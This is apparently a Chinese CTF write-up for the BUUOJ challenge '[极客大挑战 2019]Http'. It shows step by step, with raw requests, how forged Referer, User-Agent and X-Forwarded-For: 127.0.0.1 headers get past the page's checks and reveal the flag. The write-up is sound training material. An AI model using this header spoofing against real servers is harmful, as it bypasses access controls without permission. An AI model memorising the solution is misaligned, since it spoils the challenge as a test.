JZTXT

[极客大挑战 2019]Http

发布时间 2023-10-31 17:40:03作者: imtaieee

打开网页如下。
image.png
查看页面源代码,发现存在 Secret.php 页面。

<h2>小组简介</h2>
<p>·成立时间:2005年3月


·研究领域:渗透测试、逆向工程、密码学、IoT硬件安全、移动安全、安全编程、二进制漏洞挖掘利用等安全技术


·小组的愿望:致力于成为国内实力强劲和拥有广泛影响力的安全研究团队,为广大的在校同学营造一个良好的信息安全技术<a style="border:none;cursor:default;" onclick="return false" href="Secret.php">氛围</a>!</p>

访问后如下。
image.png
使用 BurpSuite 工具,在 HTTP 标头里设置:Referer: [https://Sycsecret.buuoj.cn](https://Sycsecret.buuoj.cn)

GET /Secret.php HTTP/1.1
Host: node4.buuoj.cn:26131
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: https://Sycsecret.buuoj.cn
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

响应包中提示如下。

<h1 style="font-family:arial;color:#8E44AD;font-size:50px;text-align:center;font-family:KaiTi;">
Please use "Syclover" browser</h1>

因此继续在 HTTP 标头里设置:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Syclover/118.0.0.0 Safari/537.36

GET /Secret.php HTTP/1.1
Host: node4.buuoj.cn:26131
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Syclover/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: https://Sycsecret.buuoj.cn
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

响应包中提示如下。

<h1 style="font-family:arial;color:#8E44AD;font-size:50px;text-align:center;font-family:KaiTi;">
No!!! you can only read this locally!!!</h1>

因此继续在 HTTP 标头里设置:X-Forwarded-For: 127.0.0.1

GET /Secret.php HTTP/1.1
Host: node4.buuoj.cn:26131
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Syclover/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: https://Sycsecret.buuoj.cn
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

此时,响应包中即有 flag